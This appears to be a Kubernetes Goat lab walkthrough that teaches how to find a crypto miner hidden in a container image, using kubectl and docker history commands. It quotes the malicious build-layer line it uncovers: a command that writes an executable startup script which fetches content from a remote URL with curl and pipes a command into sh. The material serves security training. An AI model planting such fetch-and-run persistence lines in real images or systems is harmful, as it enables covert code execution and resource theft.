Analysing crypto miner container

Scenario Information

Crypto mining has became popular with these modern infrastructure. Especially environments like Kubernetes is easy target as you might not event look what exactly the container image built upon and what it is doing with proactive monitoring. Here in this scenario, we will analyse and identify the crypto miner.

To get started, identify all the resources/images in the Kubernetes cluster. Including Jobs.

kubectl get jobs

Scenario 10 get jobs

Scenario Solution

Identify the all resources with in Kubernetes cluster. If possible get into details of each container image available in all the nodes with in the cluster as well

Once we have identified the job we ran in the Kubernetes cluster, got the pod information by running following command

kubectl describe job batch-check-job

Scenario 10 get job info

Then get the pod information by running the below command

kubectl get pods --namespace default -l "job-name=batch-check-job"

Then get the pod information manifest and analyse

kubectl get pod batch-check-job-xxxx -o yaml

Scenario 10 get pod info

Identified that it's running madhuakula/k8s-goat-batch-check docker image
After performing analysis of this image we identified it has the mining stuff in the build time script in one of the layer

docker history --no-trunc madhuakula/k8s-goat-batch-check

Scenario 10 get docker history

echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup

Miscellaneous

TBD

Kubernetes Goat

Analysing crypto miner container

Scenario Information

Scenario Solution

Miscellaneous